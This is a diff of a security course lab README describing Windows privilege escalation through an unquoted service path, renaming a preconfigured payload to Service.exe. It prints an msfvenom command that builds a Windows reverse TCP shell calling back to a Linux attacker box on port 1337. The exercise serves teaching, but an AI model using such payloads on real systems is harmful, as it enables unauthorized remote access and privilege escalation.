wwt9829/csc840-securityfirst/README.md

 #### Horizontal PrivEsc via Unquoted Service Path
 1. Log on to the second user created in Configuration step 1.
 2. Create a simple TCP reverse shell with `msfvenom` on the Linux Exercises box:
-      * In the example above, this would be `Automated.exe`.
+      * In the example above, this would be `Service.exe`.
-      * There is a preconfigured binary with the IP address of the Linux Exercises box and name `Automated.exe` in the Windows PrivEsc archive in the repo.
+      * There is a preconfigured binary with the IP address of the Linux Exercises box and name `Service.exe` in the Windows PrivEsc folder in the repo.
+It connects to port 1337.
-          * Password: `infected`

 ```
 msfvenom -p windows/shell_reverse_tcp LHOST=<IP address of Linux Exercises box> LPORT=1337 -f exe -o [First word of Level 2 Name].exe